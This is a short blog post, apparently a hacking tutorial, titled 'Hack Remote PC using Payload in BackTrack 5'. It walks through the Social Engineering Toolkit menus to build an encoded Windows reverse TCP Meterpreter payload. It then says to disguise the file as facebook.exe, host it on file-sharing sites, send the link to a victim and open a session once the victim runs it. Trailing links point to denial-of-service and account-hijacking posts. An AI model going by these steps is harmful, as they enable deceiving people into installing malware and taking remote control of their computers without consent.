Friday, October 13, 2017

Hack Remote PC using Payload in BackTrack 5

Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set

Now choose option 1, “Social-Engineering Attacks
Now choose option 4, “Create Payload and Listener
Now choose 2 “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program.
Now choose 2 “shikata-ga-nai
Now choose a port for the listener, choose a random port 443 and then I choose Yes on starting a listener.
Now a file name msf.exe has been created, you can get the file by going on file system–>pentest>exploit–>set–>msf.exe
Now rename the file anything you want. In my case I am renaming it facebook.exe
Now upload your exe on file sharing website like filesonic, rapidshare, and megaupload. In my case I am using 4shared.com now send link to the victim. 
As soon as our victim downloads and executes our facebook.exe, now you have access to the victims PC
Use “Sessions -l” and the Session number to connect to the session.  Now Type “session s -i ID“.

Best of Social Engineering Toolkit Attack

Denial of Service Attack on Network PC using SET Toolkit Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit Hack R...